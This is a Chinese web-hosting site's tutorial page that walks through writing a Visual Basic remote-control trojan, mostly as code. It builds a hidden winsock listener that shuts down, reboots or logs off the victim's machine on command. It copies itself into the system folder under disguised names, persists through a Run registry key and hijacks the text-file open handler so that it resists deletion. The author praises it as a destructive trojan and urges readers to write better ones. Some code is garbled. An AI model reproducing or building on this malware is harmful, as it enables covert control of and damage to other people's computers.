电信主站 网通分站
购买流程 付款方式 常见问题 在线提问 续租服务 购物车
用户名: 密 码: 忘记密码?
首 页
域名注册
虚拟主机
双线主机
服务器租用
VPS主机
企业邮局
代理专区
客服中心
虚拟主机行业资讯 虚拟主机评测对比 互联网最新动态 技术学院 站长资讯 在线教程 网站运营
搜索优化 服务器 网络编程 图形图象 站长之家 网页制作 操作系统
冲浪宝典 软件教学 视频通信 办公软件 邮件系统 网络安全 认证考试
您当前位置:西部数码->资讯中心-> 图形图象-> CORELDRAW教程
利用visualbasic实现木马攻击_visualbasic教程
作者:网友供稿 点击:0
  西部数码-全国虚拟主机10强!20余项虚拟主机管理功能,全国领先!第6代双线路虚拟主机,南北访问畅通无阻!虚拟主机可在线rar解压,自动数据恢复设置虚拟目录等.虚拟主机免费赠送访问统计,企业邮局.Cn域名注册10元/年,自助建站480元起,免费试用7天,满意再付款!P4主机租用799元/月.月付免压金!
文章页数:[1] 
首先,新建一工程,名为Server,新建一个窗体,Name为Server,在窗体中加入一个winsock控件,Name设为sckServer,协议设为默认的TCP/IP协议。

  接下来我们回来Server窗体模块中,添加如下代码:

->PrivateSubform_Load()
 WithMe
  .sckServer.LocalPort=88917本地端口(呵呵!我的生日!)
  .sckServer.Listen开始监听
 EndWith
EndSub

接受客户端的连接请求。

PrivateSubsckServer_ConnectionRequest(ByValrequestIDAsLong)
 WithMe
  If.sckServer.State<>sckClosedThen.sckServer.Close
  .sckServer.Accept(requestID)
 EndWith
EndSub->

  下面我们来建立客户端程序:新建一个工程,名为Client,把窗体名为Client,在上面加入一个winsock控件,名为sckClient,协议为TCP/IP协议。再加一个按钮cmdConnect在窗体模块中加入代码:

->PrivateSubform_Load()
 WithMe
  .sckClient.RemoteHost="127.0.0.1"设置远程IP,本例设为本机。
  .sckClient.RemotePort=88917远程端口,就为server中的设置一样.
 EndWith
EndSub

PrivatesubcmdConnect_Click()
 SckClient.Connect
Endsub->

  至此,单击Connect按钮我们的两个工程已经可以进行通信了,但看不见,你可以在Client中的sckClient_Connect事件中加入代码:debug.print“Connetionsuccessful!”来查看。

  这仅是第一步,一点工作也做不了,下面我们来为它们添加功能。为了简单,本文章只实现一点小小的功能―――关机,重启,注销。好,开始吧!

  在Server工程中新建一个模块,Name为modApi,这个模快为一些API函数,添加如下API函数:

->PublicDeclareFunctionExitWindowXXXLib"user32"Alias"ExitWindowXXX"(ByValuFlagsAsLong,ByValdwReservedAsLong)AsLong

PublicConstEWX_LOGOFF=0
PublicConstEWX_REBOOT=2
PublicConstEWX_SHUTDOWN=1
PublicDeclareFunctionClipCursorLib"user32"Alias"ClipCursor"(lpRectAsAny)AsLong

PublicTypeRECT
 LeftAsLong
 TopAsLong
 RightAsLong
 BottomAsLong
EndType->

  注:在两个socket中编程中,进行通信的重要事件是DataArrival事件,用于接收远程数据。

  下面在Client工程的Client窗体中放入三个按钮,分别为cmdExit,cmdLogoff,cmdReboot。它们用于对远程的关机,注销,重启操作。分别添加如下代码:

->PrivateSubcmdExit_Click()
 Me.sckClient.SendData"Exit"
EndSub

PrivateSubcmdLogoff_Click()
 Me.sckClient.SendData"Logoff"
EndSub

PrivateSubcmdReboot_Click()
 Me.sckClient.SendData"Reboot"
EndSub->

  全都是对服务端发出请求。下面转到Server工程中:在Server中添加sckServer的DataArrial事件,接收客户端的请求。

->PrivateSubsckServer_DataArrival(ByValbytesTotalAsLong)
 DimstrDataAsString
 WithMe
  接收客户请求的信息
  .sckServer.GetDatastrData
  SelectCasestrData
   Case"Exit"
    关机
    CallExitWindowXXX(EWX_SHUTDOWN,0)
   Case"Reboot"
    重启
    CallExitWindowXXX(EWX_REBOOT,0)
   Case"Logoff"
    注销
   CallExitWindowXXX(EWX_LOGOFF,0)
  EndSelect
 EndWith

EndSub->

  好了,到此我们已经实现功能了,但还不行,我们要它在背后运行。这简单,在Server中的form_Load事件中加入一句:me.hide。好这下看不见了,但大家知道木马是一开机就自动运行了,这又是为什么,怎么实现的?把它加入到注册表的启动组中?对,不错,跟我来吧!

  回到Server工程中的modApi中加入如下API函数:

->PublicDeclareFunctionRegOpenKeyLib"advapi32.dll"Alias"RegOpenKeyA"(ByValhKeyAsLong,ByVallpSubKeyAsString,phkResultAsLong)AsLong

PublicDeclareFunctionRegSetvalueExLib"advapi32.dll"Alias"RegSetvalueExA"(ByValhKeyAsLong,ByVallpvalueNameAsString,ByValReservedAsLong,ByValdwTypeAsLong,lpDataAsAny,ByValcbDataAsLong)AsLong

PublicDeclareFunctionRegCreateKeyLib"advapi32.dll"Alias"RegCreateKeyA"(ByValhKeyAsLong,ByVallpSubKeyAsString,phkResultAsLong)AsLong
PublicConstREG_BINARY=3

PublicConstREG_SZ=1

PublicConstHKEY_LOCAL_MACHINE=&H80000002

PublicConstHKEY_CLASSES_ROOT=&H80000000->

  写到注册表启动组中的过程。

->PublicSubStartupGroup()

 DimsKeyAsString
 DimresultAsLong
 DimhKeyIDAsLong
 DimsKeyValAsString

 sKey="Systrsy"启动组中的键,找一个与系统文件相近的。
 sKeyVal="C:/windows/system/systrsy.exe"木马文件的路径,可以用GetSystemDirectory来取得系统路径。
 result=RegOpenKey(HKEY_LOCAL_MACHINE,_
   "Software/Microsoft/Windows/CurrentVersion/Run",hKeyID)
 Ifresult=0Then
  result=RegSetvalueEx(hKeyID,sKey,0&,REG_SZ,sKeyVal,Len(sKey) 1)
 EndIf
EndSub->

  好,就这样简单地完成了。但是,想过没有,如果不是很菜的鸟,到注册表中见一删,我们苦苦的心血不就白白地浪费了吗?不行,还得想让他发现了删也删不掉。请看下面的代码:

->PublicSubWriteToTxt()

 DimresultAsLong
 DimhKeyIDAsLong
 DimskeyAsString
 DimskeyValAsString

 skey="txtfile/shell/open/command"
 skeyVal="C:/windows/system/txtView.exe"
 result=RegOpenKey(HKEY_CLASSES_ROOT,skeyVal,hKeyID)

 Ifresult=0Then
  result=RegSetvalueEx(hKeyID,skey,0&,REG_SZ,skeyVal,Len(skeyVal) 1)
 EndIf
EndSub->

  肯定不少朋友一看就知道了,原是与txt文件进行关联,一点也不错,但C:/windows/system/txtView.exe是哪里来的,我们的木马是C:/windows/system/systrsy.exe呀。这可是我们木马的分身了。

  好,回到Server工程的Server窗体的form_Load中,加入如下代码:

->DimsCurrentPathAsString,sSystemDirAsString
sCurrentPath=App.Path&"/"&App.EXEName&".exe"
sSystemDir=“C:/windows/system”
OnErrorResumeNext

 复制文件成系统目录下的Systrsy.exe
 FileCopysCurrentPath,sSystemDir&"/Systrsy.exe"
OnErrorResumeNext

复制文件成系统目录下的txtView.exe

FileCopysCurrentPath,sSystemDir&"/txtView.exe"->

  调用

->CallstartupGroup
CallWriteToTxt

判断程序是否下在运行

IfApp.PrevInstanceThen
 如果已经运行就退出。
End

EndIf->

  好了,写到这里一个破坏性木马已经诞生了,我实验过还是比较好的一个,希望大家也能写一个好的木马,能突破冰河(呵呵!)

  注意:

  1、大家在处理端口是最好使用高端端口,否则会和一些常用端口发生冲突

  2、在第一次使用VB.NET的最好看看有关的图书,可能你能写出一款超级木马也说不定
->


文章整理:西部数码--专业提供域名注册虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
相关主题
文章页数:[1] 
Google
热门文章
·coreldraw x3体验:全新复制功能_coreldraw教程
·photoshop绘中秋佳节的一轮明月_photoshop教程
·用vb编程检测当前电池使用情况_visualbasic教程
·解除网虫心病vb做定时断线程序_visualbasic教程
·利用visualbasic实现木马攻击_visualbasic教程
·利用ini文件给程序创建动态菜单_visualbasic教程
·实现窗体内部的左右移动_visualbasic教程
·coreldraw最新版x3之试用手记(1)_coreldraw教程
·photoshop轻松制作图案叠加的文字特效_photoshop教程
·coreldraw滤镜转彩色矢量图为灰度_coreldraw教程

最新文章
·互联网域名资源占用总比荒芜好
·fireworks 8绘制精致指南针图案_fireworks教程
·photoshop素材合成实例:晚霞艺术照_photoshop教程
·在coreldraw中如何保证调色板的颜色相同?_coreldraw教程
·在coreldraw中如何自由擦除线条?_coreldraw教程
·在coreldraw中快速准确地勾好轮廓_coreldraw教程
·如何在coreldraw中快速拷贝色彩和属性?_coreldraw教程
·用coreldraw交互式变形绘制斑斓孔雀_coreldraw教程
·用coreldraw绘可爱monokuro_boo黑白猪图案_coreldraw教程
·coredraw表格导入终极解决方案_coreldraw教程


 
 


版权申明:本站文章均来自网络,如有侵权,请联系我们,我们收到后立即删除,谢谢!

特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有。
  打印  刷新  关闭
返回首页 |关于我们 | 联系我们 | 付款方式 | 创业联盟 | 虚拟主机 | 资讯中心 | 友情链接 | 网站地图

版权所有 西部数码(www.west263.com)
CopyRight (c) 2002~2006 west263.com all right reserved.
公司地址:四川成都市万和路90号天象大厦4楼 邮编:610031
电话总机:028-86262244 86263048 86263408 86263960 86264018 86267838
售前咨询:总机转201 202 203 204 206 208
售后服务:总机转211 212 213 214
财务咨询:总机转224 223 传真:028-86264041 财务QQ:点击发送消息给对方635483282
售前咨询QQ:点击发送消息给对方2182518 点击发送消息给对方241975952 点击发送消息给对方275026793 点击发送消息给对方408235859
售后服务QQ:点击发送消息给对方17708515 点击发送消息给对方307742704 点击发送消息给对方287976517 点击发送消息给对方363783715
《中华人民共和国增值电信业务经营许可证》编号:川B2-20030065号